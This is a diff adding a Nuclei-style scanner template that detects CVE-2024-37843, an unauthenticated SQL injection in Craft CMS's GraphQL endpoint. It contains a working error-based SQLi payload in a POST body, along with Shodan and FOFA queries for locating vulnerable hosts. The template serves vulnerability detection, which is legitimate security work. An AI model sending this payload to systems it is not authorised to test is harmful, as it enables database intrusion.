Create CVE-2024-37843.yaml

http/cves/2024/CVE-2024-37843.yaml

@@ -0,0 +1,58 @@
+id: CVE-2024-37843
+
+info:
+  name: Craft CMS <=v3.7.31 - SQL Injection
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.
+  reference:
+    - https://blog.smithsecurity.biz/craft-cms-unauthenticated-sqli-via-graphql
+    - https://github.com/gsmith257-cyber/CVE-2024-37843-POC
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-37843
+    cwe-id: CWE-89
+    epss-score: 0.00091
+    epss-percentile: 0.39447
+    cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
+  metadata:
+    vendor: craftcms
+    product: craft_cms
+    shodan-query:
+      - cpe:"cpe:2.3:a:craftcms:craft_cms"
+      - http.html:"craftcms"
+      - http.favicon.hash:"-47932290"
+      - "X-Powered-By: Craft CMS"
+    fofa-query:
+      - body=craftcms
+      - icon_hash=-47932290
+    publicwww-query: craftcms
+  tags: cve,cve2024,craftcms,sqli
+
+variables:
+ matcher: "{{rand_base(4)}}"
+
+http:
+  - raw:
+      - |
+        POST /api/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type:application/json
+
+        {"query":"query  IntrospectionQuery  {assets(orderBy: \"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\", limit: 5){filename}}"}
+
+    skip-variables-check: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "General error: 1105 XPATH syntax error: '\\n{{matcher}}"
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - "application/json"